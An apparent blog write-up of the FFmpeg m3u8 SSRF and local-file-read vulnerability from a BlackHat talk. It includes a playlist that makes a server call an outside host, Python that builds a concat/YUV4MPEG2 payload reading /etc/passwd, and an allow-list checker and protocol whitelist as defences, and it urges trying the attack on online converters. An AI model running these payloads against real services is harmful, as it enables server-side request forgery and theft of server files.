Background
- dozens of video formats
- hundreds of video/audio codecs
- different bitrates, resolutions, etc.
FFmpeg
what is FFmpeg
According to Wikipedia, FFmpeg is a free software project that produces libraries and programs for handling multimedia data. In short, it is a video conversion tool.
How FFmpeg really works
A closer look at ffmpeg: file extensions
Play video out.mp4:
HTTP Live Streaming (HLS)
- Live and on-demand streaming
- Developed by Apple
- Supported by FFmpeg
- Docs: https://developer.apple.com/streaming/
m3u8
A file with the M3U8 extension is a UTF-8 encoded playlist. M3U8 files are plain text and can be used by both audio and video players to describe where the media files are located. For more, see https://www.lifewire.com/m3u8-file-2621956
Make an HTTP request
Result:
Read response
Convert the same way as above, but with header.m3u8 containing the following (the segment URI points at a host we control, so the converting server makes the HTTP request for us):
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://hydrasky.com/?.txt
#EXT-X-ENDLIST
Here we are:
Exploit
Concat
Concat: reads a binary stream of data from multiple sources and interprets it as if it came from a single source. In FFmpeg this is the concat: protocol, written as concat:URL1|URL2|..., and each URL may itself use another protocol (http, file, ...).
YUV4MPEG2
YUV4MPEG2 is an uncompressed format: a plain-text stream header followed by raw frames, so whatever bytes follow the header are decoded as pixels. The file header.y4m is hosted on the server at localhost/header.y4m, and the playlist concatenates it with the file we want to read.
video.mp4
Yes, it works!
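The following is an added example, not code from the original post or from the BlackHat talk it draws on. It puts the two pieces above into working code: the m3u8 playlist with a concat: segment that glues a remote YUV4MPEG2 header onto a local file (the header URL http://localhost/header.y4m is taken from the post; the target path /etc/passwd and the 8x8 frame size are assumptions), and then the check a converter should apply to every segment URI before handing a playlist to ffmpeg. Nested URIs such as concat:http://...|file:///... are unwrapped so that each protocol they carry is seen by the whitelist. The ffmpeg_argv helper adds FFmpeg's own -protocol_whitelist option (present in FFmpeg 3.x and later; confirm the protocol names with ffmpeg -protocols on your build) as a second layer, leaving file out whenever the input itself comes from the network.

```python
import re

# Stream header for an 8-bit greyscale YUV4MPEG2 stream (assumed 8x8 frames).
# Every byte after the FRAME marker is treated as pixel data, so whatever is
# concatenated after this header (here a local file) ends up in the video.
def build_y4m_header(width=8, height=8):
    return (f"YUV4MPEG2 W{width} H{height} F25:1 Ip A1:1 Cmono\n"
            "FRAME\n").encode()

def build_playlist(header_url, target):
    """The post's playlist: one segment whose URI is a concat: of the remote
    y4m header and the target, read by ffmpeg as a single stream."""
    segment = f"concat:{header_url}|{target}"
    return "\n".join([
        "#EXTM3U",
        "#EXT-X-MEDIA-SEQUENCE:0",
        "#EXTINF:10.0,",
        segment,
        "#EXT-X-ENDLIST",
        "",
    ])

def parse_segments(playlist):
    """Segment URIs are the non-blank lines that are not tags or comments."""
    return [ln.strip() for ln in playlist.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]

_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")

def uri_schemes(uri):
    """Every protocol name in a possibly nested ffmpeg URI.
    concat:a|b wraps other URIs, so split on '|' and peel prefixes such as
    'concat:' until a network-style URL ('scheme://') is reached; the
    authority part of such a URL may contain ':' and must not be re-parsed."""
    found = set()
    for part in uri.split("|"):
        rest = part.strip()
        while True:
            m = _SCHEME.match(rest)
            if not m:
                break
            found.add(m.group(1).lower())
            after = rest[m.end():]
            if after.startswith("//"):
                break
            rest = after
    return found

ALLOWED = frozenset({"http", "https"})

def check_playlist(playlist, allowed=ALLOWED):
    """Segment URIs a converter must reject before running ffmpeg.
    A relative segment (no scheme) yields an empty set and is accepted."""
    return [seg for seg in parse_segments(playlist)
            if uri_schemes(seg) - set(allowed)]

def ffmpeg_argv(src, dst, allowed=ALLOWED):
    """ffmpeg command line with a protocol whitelist as defence in depth.
    'file' is only added when the input is a local path on disk."""
    protos = set(allowed) | {"tcp", "tls"}
    if not uri_schemes(src):
        protos.add("file")
    return ["ffmpeg", "-protocol_whitelist", ",".join(sorted(protos)),
            "-i", src, dst]

if __name__ == "__main__":
    evil = build_playlist("http://localhost/header.y4m", "file:///etc/passwd")
    print(evil)
    print("rejected:", check_playlist(evil))
    print(" ".join(ffmpeg_argv("header.m3u8", "video.mp4")))
```

The pre-check is the part that matters: anything not in the allow-list (concat, file, subfile, and every other FFmpeg protocol) is rejected before ffmpeg sees it, and -protocol_whitelist catches what the parser might miss. Note that "file" has to stay in ffmpeg's whitelist when the playlist is a local upload, which is exactly why the segment check must run first.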
Conclusion
- Solution: the FFmpeg protocol whitelist patch
- Versions later than 3.2.2 have this vulnerability fixed
- There are three attack vectors you can exploit: thumbnail, DNS, or mp4.
- The simplest scenario: upload a video file to a server that offers online video conversion; if it uses ffmpeg, try to exploit it.
References
https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf
Nice writeup! Helped me solve a CTF!